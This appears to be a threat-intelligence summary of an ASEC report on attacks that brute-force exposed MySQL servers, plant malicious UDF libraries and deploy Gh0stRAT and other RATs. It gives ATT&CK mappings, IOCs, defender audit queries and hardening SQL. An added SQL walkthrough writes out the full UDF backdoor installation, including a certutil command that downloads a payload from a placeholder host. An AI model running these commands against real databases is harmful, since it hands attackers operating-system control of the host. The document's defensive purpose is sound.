Full Report
AhnLab SEcurity intelligence Center (ASEC) is monitoring attacks targeting poorly managed services, and has confirmed that MySQL servers have remained a continuous target of attacks. Threat actors are believed to be targeting various externally accessible systems, leading to the infection of multiple systems in Korea with malware. The majority of malware strains used in […]
Analysis Summary
# Tool/Technique: MySQL Server Exploitation and UDF Malware
## Overview
This entry summarises a series of ongoing attacks against poorly managed MySQL servers, typically ones exposed to the Internet on 3306/TCP. The attackers gain access by brute-force or dictionary attacks against database logins, install a malicious User Defined Function (UDF) library that lets them run operating-system commands through the MySQL server, and then use that foothold to deploy remote access tools and further malware.
## Technical Details
- Type: Technique/Malware (malicious MySQL UDF libraries; Gh0stRAT variants, XWorm, AsyncRAT, Ddostf and HpLoader payloads; Zoho ManageEngine's UEMS agent abused as a legitimate remote-management tool)
- Platform: Windows (MySQL is more often deployed on Linux, but the attacks documented here target Windows hosts that expose the MySQL service)
- Capabilities: Brute-forcing access, executing arbitrary commands via UDFs, installing RATs, downloading further payloads, and deploying remote management tools.
- First Seen: Ongoing/Continuous targeting observed.
## MITRE ATT&CK Mapping
The overall attack chain involves several key mappings:
- **TA0001 - Initial Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing (dictionary attacks against exposed MySQL logins)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (OS commands run through the malicious UDF)
- **TA0003 - Persistence**
- T1543.003 - Windows Service (where RATs or management agents are installed as services)
- **TA0004 - Privilege Escalation / TA0005 - Defense Evasion**
- T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control (UACMe routines embedded in Gh0stRAT variants)
- **TA0009 - Collection**
- T1113 - Screen Capture (Gh0stRAT screenshot feature)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (C2 communication from deployed RATs)
- T1105 - Ingress Tool Transfer (payloads downloaded from attacker URLs via the UDF)
- T1219 - Remote Access Software (Zoho ManageEngine agent installed silently)
## Functionality
### Core Capabilities
- **MySQL Compromise:** Threat actors use brute-force or dictionary attacks against publicly exposed MySQL port 3306/TCP.
- **UDF Malware Installation:** A malicious DLL is written to the MySQL plugin directory over the compromised database connection (typically with `SELECT ... INTO DUMPFILE`, which requires the FILE privilege) and registered with `CREATE FUNCTION ... SONAME`, which loads it into the mysqld process.
- **Command Execution:** The registered UDF acts as a backdoor: OS commands passed as its arguments run inside mysqld.exe with the rights of the MySQL service account, so an over-privileged service account turns a database login into full host compromise.
- **Payload Delivery:** Through the UDF the attackers download files from attacker-controlled URLs to install secondary malware, or execute stagers directly in memory.
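The installation sequence described above, and the audit queries a defender runs against it, as an added illustration in MySQL SQL (this is not code from the ASEC report). The function names `sys_exec` and `sys_eval`, the file name `udf.dll`, the plugin path and the placeholder URL follow the well-known lib_mysqludf_sys pattern and are assumptions; the report does not name the library or export names the attackers used.

```sql
-- Added illustration, not code from the ASEC report: the standard way a UDF
-- backdoor is installed once an attacker holds a MySQL login with the FILE
-- privilege, followed by the audit queries a defender runs to find one.
-- Assumptions: sys_exec, sys_eval, udf.dll and the plugin path follow the
-- lib_mysqludf_sys pattern; the report does not name the attackers' library.

-- Attacker side -------------------------------------------------------------

-- 1. UDF libraries are loaded only from plugin_dir, so the DLL has to land
--    exactly there (on Windows usually <basedir>\lib\plugin\).
SHOW VARIABLES LIKE 'plugin_dir';

-- 2. Write the DLL over the existing SQL connection. INTO DUMPFILE writes the
--    value byte-for-byte, without the row/column formatting of INTO OUTFILE.
--    The hex literal stands in for the real DLL image (tens of kilobytes).
--    Requires FILE; refused when secure_file_priv is NULL or names another
--    directory. Forward slashes are accepted by MySQL on Windows.
SELECT 0x4D5A90000300000004000000FFFF0000
  INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 8.0/lib/plugin/udf.dll';

-- 3. Register the DLL's exports as SQL functions. This inserts rows into
--    mysql.func and loads the DLL into the mysqld process.
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.dll';
CREATE FUNCTION sys_eval RETURNS STRING  SONAME 'udf.dll';

-- 4. From now on any query is an OS command running as the MySQL service
--    account. The first call mirrors the report's "download a file from a
--    URL" capability (placeholder URL); the second returns command output.
SELECT sys_exec('cmd.exe /c certutil.exe -urlcache -split -f http://example.invalid/payload.exe C:\\PerfLogs\\payload.exe');
SELECT sys_eval('whoami');

-- Defender side -------------------------------------------------------------

-- A server that has never had UDFs installed returns no rows here. Any row
-- whose dl is not a library you deployed deliberately is the indicator.
SELECT name, ret, dl, type FROM mysql.func;

-- Accounts that could have written the DLL in the first place.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- NULL disables file import/export entirely; '' permits it anywhere.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Cleanup: unregister the functions, then delete udf.dll from plugin_dir.
DROP FUNCTION IF EXISTS sys_exec;
DROP FUNCTION IF EXISTS sys_eval;
```

The `mysql.func` query is the cheapest check to add to a periodic audit of every reachable MySQL instance: a row with an unfamiliar `dl` value is a stronger indicator than any file hash, because the DLL is rebuilt per campaign while the registration step is unavoidable.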
### Advanced Features
- **Gh0stRAT Integration:** Gh0stRAT variants are routinely deployed; some embed UAC bypass routines taken from the open-source UACMe project in order to escalate privileges on the host.
- **Screen Capture:** Gh0stRAT variants specifically capture screenshots and save them to `%ALLUSERSPROFILE%\quickScreenShot\[Date]\[Date+Time].jpg`.
- **Remote Management Abuse:** Legitimate remote-management software is installed for persistent control, namely Zoho ManageEngine's UEMS agent, deployed silently using `C:\PerfLogs\Install.bat` together with `C:\PerfLogs\Server_Agent.exe`.
## Indicators of Compromise
- File Hashes (MD5):
- `2cd59cff23a2e0f98e710bf52b799154`
- `33096e0bc0785ffb2094054bebb9be26`
- `3ee3a5fef87b72a024bd0f45e6f6039f`
- `454ff880e99d5777276bdee1a3e078d9`
- `9d098864bc5746b9ff00432686d59b9f`
- File Names:
- `Server_Agent.exe`
- `Install.bat`
- Registry Keys: Not detailed in the report. Persistence set up by the deployed RATs (Gh0stRAT, XWorm) would be expected to involve Run keys or service registrations, but no specific keys are documented.
- Network Indicators:
- Command and Control/Dropper URLs:
- `hxxp://39[.]108[.]132[.]22:8080/ceshi[.]exe`
- `hxxp://star[.]zcnet[.]net:7766/Server[.]exe`
- FQDNs:
- `star[.]zcnet[.]net`
- `yyinfo8999[.]fit`
- IPs:
- `103[.]101[.]178[.]170`
- `154[.]204[.]177[.]54`
- `154[.]222[.]24[.]186`
- `39[.]108[.]132[.]22`
- Behavioral Indicators:
- mysqld.exe spawning command interpreters or other child processes (cmd.exe, powershell.exe), which a database server has no legitimate reason to do and which indicates UDF abuse.
- File creation in `%ALLUSERSPROFILE%\quickScreenShot\`.
- Installation components deployed to `C:\PerfLogs\`.
- Communication with remote control servers over non-standard ports (e.g., 7766).
## Associated Threat Actors
- Threat actors targeting poorly managed external services (No specific group named, but utilizing generalized commodity malware like Gh0stRAT variants).
## Detection Methods
- Signature-based detection: Identification of known malware hashes and family signatures (Gh0stRAT, XWorm, AsyncRAT, Ddostf, HpLoader).
- Behavioral detection: Monitoring for DLLs written to the MySQL plugin directory or new entries in the `mysql.func` table, for unauthorized DLLs loaded into the MySQL process, and for mysqld.exe spawning shell processes.
- YARA rules: Applicable to the UDF DLLs and to the embedded configurations of the deployed RATs, which are commodity families for which public rules exist.
## Mitigation Strategies
- **Network Restriction:** Do not expose MySQL (3306/TCP) to the Internet unless strictly necessary; where it must be reachable, restrict source IPs with firewall or security devices and require TLS.
- **Credential Strength:** Enforce strong, unique passwords for all database accounts, remove anonymous and wildcard-host (`'%'`) accounts, and enable login lockout so dictionary attacks stall.
- **Privilege Minimization:** Limit database accounts to the privileges they need (in particular withhold FILE and write access to the `mysql` schema, which the UDF technique depends on), confine file I/O with `secure_file_priv`, and run the mysqld service under a dedicated low-privileged Windows account rather than SYSTEM or an administrator, since UDF code executes with that account's rights.
- **Patching:** Keep MySQL and the underlying operating system fully patched against known vulnerabilities.
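The credential and privilege measures above, expressed as MySQL 8.0 statements, as an added illustration that is not part of the ASEC report. The account name `'app'`, the subnet `10.0.10.%`, the schema `appdb` and the `'legacy_app'` account are placeholders; the lockout and `validate_password` component syntax assumes MySQL 8.0.19 or later.

```sql
-- Added illustration, not code from the ASEC report: MySQL-side hardening
-- that removes the preconditions the UDF technique relies on. 'app', 'legacy_app',
-- 10.0.10.% and appdb are placeholders; syntax assumes MySQL 8.0.19 or later.

-- 1. Find what a password-guessing attacker can log in as from anywhere:
--    anonymous accounts and accounts with a wildcard host.
SELECT user, host FROM mysql.user WHERE host = '%' OR user = '';

-- 2. Replace wildcard-host logins with host-restricted ones. A MySQL account
--    is identified by user AND host, so 'app'@'10.0.10.%' simply does not
--    exist for a connection arriving from the Internet, whatever the password.
--    REQUIRE SSL keeps the credentials off the wire in clear text.
CREATE USER IF NOT EXISTS 'app'@'10.0.10.%'
  IDENTIFIED BY 'replace-with-a-long-random-secret'
  REQUIRE SSL;
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'app'@'10.0.10.%';
DROP USER IF EXISTS 'root'@'%';

-- 3. Nobody but DBAs writes files or registers functions. INTO DUMPFILE needs
--    FILE; CREATE FUNCTION ... SONAME needs INSERT on the mysql schema. The
--    grants above give 'app' neither; for an older account that was created
--    with ALL PRIVILEGES, strip them explicitly.
REVOKE FILE ON *.* FROM 'legacy_app'@'10.0.10.%';
REVOKE INSERT ON mysql.* FROM 'legacy_app'@'10.0.10.%';

-- 4. Lock the account after repeated failures so a dictionary attack stalls
--    after five wrong guesses for one day instead of running until it works.
ALTER USER 'app'@'10.0.10.%' FAILED_LOGIN_ATTEMPTS 5 PASSWORD_LOCK_TIME 1;

-- 5. Enforce password strength server-wide. INSTALL COMPONENT errors if the
--    component is already loaded; skip it in that case.
INSTALL COMPONENT 'file://component_validate_password';
SET PERSIST validate_password.policy = 'STRONG';
SET PERSIST validate_password.length = 16;

-- 6. secure_file_priv is read-only at runtime. Set it in my.ini under [mysqld]
--    as  secure-file-priv = NULL  to disable file import/export entirely, or
--    to a dedicated directory that is not plugin_dir, then restart the service.

-- 7. Outside SQL: run the MySQL Windows service under a dedicated
--    low-privileged account, since UDF code inherits whatever rights it has.
```

Steps 2 and 3 are the ones that directly break the chain in this report: without a wildcard-host account there is nothing for the brute force to hit, and without FILE the DLL cannot be written to `plugin_dir` even after a successful login.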
## Related Tools/Techniques
- **Malware Families:** Gh0stRAT, AsyncRAT, Ddostf DDoS Bot, XWorm, HpLoader.
- **Abused Legitimate Tools:** Zoho ManageEngine (UEMS Agent).
- **Related Database Exploitation Technique:** CLR SqlShell abuse (mentioned in comparison to MS-SQL servers).